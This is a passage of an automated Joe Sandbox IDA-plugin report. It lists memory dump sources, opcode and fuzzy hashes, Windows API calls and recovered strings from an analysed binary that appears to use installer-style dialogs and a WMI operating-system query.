    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 89795a0f3e80b7e574dadec12b93924dc3bedc48d2dcc7c280c7edb63a943df0
    • Instruction ID: 3176c957f430571c84b0086742ae89ab0c92f5d384bbb4edd2fe96bf60e5ecd9
    • Opcode Fuzzy Hash: 89795a0f3e80b7e574dadec12b93924dc3bedc48d2dcc7c280c7edb63a943df0
    • Instruction Fuzzy Hash: 9BE16C755183908FC304CF29D48046ABBF0BB9A300F9A496EFAD587352CB35EA15DF96
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction ID: d92f8c15649869e57a995d9c5da4c17aa1eadcca2adb320c4ed1893353f9a27e
    • Opcode Fuzzy Hash: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction Fuzzy Hash: 7F9133B0200B459BDB24EA64DCE5BFF77D5AB90307F10082DED9A87282EB64D98DC751
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction ID: 36b221f7955d5f3fe8e5c682a2e0b0572bb8192005bb5275acf2da52ac347111
    • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction Fuzzy Hash: 3E8138B1308B459BEB24DA28DCE5BBF37D59B94306F40092DED868B282DA60C8898755
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dc9b7f03efae9519355111b5d0e437d93fe06e6636e3984223652807b5061c44
    • Instruction ID: 7063ea3c853f417ae29efc7ff65d75c178cbb080d9c48d20e63fecb38cd5cd40
    • Opcode Fuzzy Hash: dc9b7f03efae9519355111b5d0e437d93fe06e6636e3984223652807b5061c44
    • Instruction Fuzzy Hash: A9617BB1600F08A6DEB45A68E9A7BFE63CBEB41704F14051EF943DB286DA13DE418355
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction ID: 48f85db92d066b7fb995a58a34f935b3a535755bcc44630f38d5764979b9e1c5
    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction Fuzzy Hash: 59518A70600B5597DFB48E6889657FF67DB9B52300F18092EE842DB383CA17EF458356
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 34f3d7a8df62df9c7df3776d5dd22dd6f03114b7033ce91934ffe9fa90963736
    • Instruction ID: b28959a7cf8355c8cc004171b97ab672787c896ea1a6483635164caea62a9fc6
    • Opcode Fuzzy Hash: 34f3d7a8df62df9c7df3776d5dd22dd6f03114b7033ce91934ffe9fa90963736
    • Instruction Fuzzy Hash: F051CE715093958BC752CF28C1805AFBFE4AF9A315F4A09A9E8D95B243C231DB4ECF52
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 51e60fbdde86a4e3a97d7fdda07f96a97f4d4287334ef17bbb245ee3bac51cd0
    • Instruction ID: 25bce6f60c8b8c505a15a3cd1833d95ed0577b580bae83618c8d09e0c8973b67
    • Opcode Fuzzy Hash: 51e60fbdde86a4e3a97d7fdda07f96a97f4d4287334ef17bbb245ee3bac51cd0
    • Instruction Fuzzy Hash: AB51EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3300DB34E959CB96
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction ID: 8f7be77572a20acdd1c6b9c05b895e7edf2350d1122ae91cc44447d0f357c2b4
    • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction Fuzzy Hash: 8D31E5B5604B068FC714DF28CCA12ABBBD0EB95302F10492DE896C7742C735E909CF95
    APIs
    • __EH_prolog.LIBCMT ref: 0005D877
      • Part of subcall function 0005C4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005C5DB
    • _wcslen.LIBCMT ref: 0005DB3D
    • _wcslen.LIBCMT ref: 0005DB46
    • SetWindowTextW.USER32(?,?), ref: 0005DBA4
    • _wcslen.LIBCMT ref: 0005DBE6
    • _wcsrchr.LIBVCRUNTIME ref: 0005DD2E
    • GetDlgItem.USER32(?,00000066), ref: 0005DD69
    • SetWindowTextW.USER32(00000000,?), ref: 0005DD79
    • SendMessageW.USER32(00000000,00000143,00000000,0009389A), ref: 0005DD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005DDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: 864c9ff0a9bed3053c9abb4ec52c6940425365fad2e81e4528cc319da328326f
    • Instruction ID: b7920c66dec553d14182e35e7c79542f8c2a82c0e17ebaa4a86c4b8cb25bc607
    • Opcode Fuzzy Hash: 864c9ff0a9bed3053c9abb4ec52c6940425365fad2e81e4528cc319da328326f
    • Instruction Fuzzy Hash: A3E15272900658AADB24DBA0DC85EEF77FCEB05311F5440A6FA49E7051EB749F88CB60
    APIs
    • _swprintf.LIBCMT ref: 0004F62E
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
      • Part of subcall function 000530E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00083070,00000200,0004EC48,00000000,?,00000050,00083070), ref: 00053102
    • _strlen.LIBCMT ref: 0004F64F
    • SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F6AF
    • GetWindowRect.USER32(?,?), ref: 0004F6E9
    • GetClientRect.USER32(?,?), ref: 0004F6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 0004F795
    • GetWindowRect.USER32(?,?), ref: 0004F7C2
    • SetWindowTextW.USER32(?,?), ref: 0004F7FB
    • GetSystemMetrics.USER32(00000008), ref: 0004F803
    • GetWindow.USER32(?,00000005), ref: 0004F80E
    • GetWindowRect.USER32(00000000,?), ref: 0004F83B
    • GetWindow.USER32(00000000,00000002), ref: 0004F8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 38ac81b79ffeddfcb476ba11cddfc2ab528f25f0e476b9b6ed070ed220efb868
    • Instruction ID: 370ee9947085aec2ca33816376c436a70d200422c1395369c791d56be3b9ee34
    • Opcode Fuzzy Hash: 38ac81b79ffeddfcb476ba11cddfc2ab528f25f0e476b9b6ed070ed220efb868
    • Instruction Fuzzy Hash: 8B81B1B2208741AFD710DF68CD89A7BBBE9FB89704F04092DFA84D7251D774E8098B52
    APIs
    • ___free_lconv_mon.LIBCMT ref: 0006DD16
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8CE
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8E0
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D8F2
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D904
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D916
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D928
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D93A
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D94C
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D95E
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D970
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D982
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D994
      • Part of subcall function 0006D8B1: _free.LIBCMT ref: 0006D9A6
    • _free.LIBCMT ref: 0006DD0B
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006DD2D
    • _free.LIBCMT ref: 0006DD42
    • _free.LIBCMT ref: 0006DD4D
    • _free.LIBCMT ref: 0006DD6F
    • _free.LIBCMT ref: 0006DD82
    • _free.LIBCMT ref: 0006DD90
    • _free.LIBCMT ref: 0006DD9B
    • _free.LIBCMT ref: 0006DDD3
    • _free.LIBCMT ref: 0006DDDA
    • _free.LIBCMT ref: 0006DDF7
    • _free.LIBCMT ref: 0006DE0F
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
    • Instruction ID: 9c6e09abb802f74484d7de5c10a8bb85d5d1689b9774b8afe9e4872da4d2e2ae
    • Opcode Fuzzy Hash: 61c351c72bf9d3cbbfec7404cca60ee6a870e8c7847088c0e4b251910f3c5c3f
    • Instruction Fuzzy Hash: 20314A31F002049FEB60BA38D849B9673EAFF51311F18442BF459E7152DE31AC54CB25
    APIs
    • __EH_prolog.LIBCMT ref: 0004C3FC
    • CoCreateInstance.COMBASE(000768A0,00000000,00000001,000767D0,?), ref: 0004C41E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$Pzv$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-2036231139
    • Opcode ID: 66ea4a3561ed154572dac131caa4be3e287508ad79f5b6a5d3f70371cb6745ad
    • Instruction ID: 84e151cd41ab1ba40bad8e7100fefa7b2faa9933b50550d8b18830e8365c2ac8
    • Opcode Fuzzy Hash: 66ea4a3561ed154572dac131caa4be3e287508ad79f5b6a5d3f70371cb6745ad
    • Instruction Fuzzy Hash: 6F717FB1A016199FEB54DFA4CC94DBEB7B9FF88310B044169F506A72A1CB34AD41CB54
    APIs
    • _wcslen.LIBCMT ref: 0005A6E6
    • _wcslen.LIBCMT ref: 0005A786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 0005A795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0005A7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0005A7DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 33b1dc1bebdc8d5d4d63408e5780781b1708e8bab32528f7bb4e4021f74ea8ae
    • Instruction ID: 188a4817dc460f51367a2abfb6f79fd7ea1653e1243b34f552acb4731a4cd562
    • Opcode Fuzzy Hash: 33b1dc1bebdc8d5d4d63408e5780781b1708e8bab32528f7bb4e4021f74ea8ae
    • Instruction Fuzzy Hash: 25316C316087057EE714AB609C06FAF77A8EF46722F14061EF905961C2FF68994D83A6
    APIs
    • GetWindow.USER32(?,00000005), ref: 0005E801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 0005E82D
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005E849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005E860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005E874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005E89D
    • DeleteObject.GDI32(00000000), ref: 0005E8A4
    • GetWindow.USER32(00000000,00000002), ref: 0005E8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 52076b594d24c20312f1c8b75afaa1ed4dc66bc9e9c86758e71c58c9129ee5b2
    • Instruction ID: 7a472bf4c4679154dc9d202113e8c140fad06332d038d69c5f6ec38661c991a8
    • Opcode Fuzzy Hash: 52076b594d24c20312f1c8b75afaa1ed4dc66bc9e9c86758e71c58c9129ee5b2
    • Instruction Fuzzy Hash: 9B11C372644E507BE2216B60DC49FBF369CBF46713F000135FE85A6092DB689E0A86B5
    APIs
    • _free.LIBCMT ref: 0006A425
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006A431
    • _free.LIBCMT ref: 0006A43C
    • _free.LIBCMT ref: 0006A447
    • _free.LIBCMT ref: 0006A452
    • _free.LIBCMT ref: 0006A45D
    • _free.LIBCMT ref: 0006A468
    • _free.LIBCMT ref: 0006A473
    • _free.LIBCMT ref: 0006A47E
    • _free.LIBCMT ref: 0006A48C
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
    • Instruction ID: 3f5227c67212429511d2e205c81da4972172d003cdacaa23c9f4e291bdfec800
    • Opcode Fuzzy Hash: abe211173ba0f0e78ec5d88d4827a281f37e8e6de31ad5560505355908ae48a5
    • Instruction Fuzzy Hash: 6411A476A00108BFCB01FF54C856CD93BA6EF15351B5580A1FA1C9B223DA31EE519FA2
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: 69b7a78fd485cdbb9b72a84a107aad850069e49410e191c54a87e2cf1f293f0d
    • Instruction ID: da01ac37f6c663f6e9c886973bfb115afcbfdb6ae8d720b9dece3c9dec2ebeab
    • Opcode Fuzzy Hash: 69b7a78fd485cdbb9b72a84a107aad850069e49410e191c54a87e2cf1f293f0d
    • Instruction Fuzzy Hash: E3B18971C0021AEFCF29DFA4C8819AEBBB6FF15310F64416AF9156B212D731DA61CB91
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005C7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005C817
